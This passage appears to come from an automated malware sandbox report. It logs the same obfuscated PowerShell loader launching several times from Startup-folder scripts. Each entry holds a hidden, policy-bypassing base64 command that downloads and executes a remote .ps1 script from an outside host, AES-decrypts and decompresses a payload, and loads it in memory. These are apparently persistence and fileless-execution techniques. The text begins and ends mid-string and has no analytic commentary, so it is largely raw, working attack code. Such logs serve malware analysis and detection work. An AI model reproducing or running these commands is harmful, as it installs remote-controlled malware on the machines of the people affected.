JywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c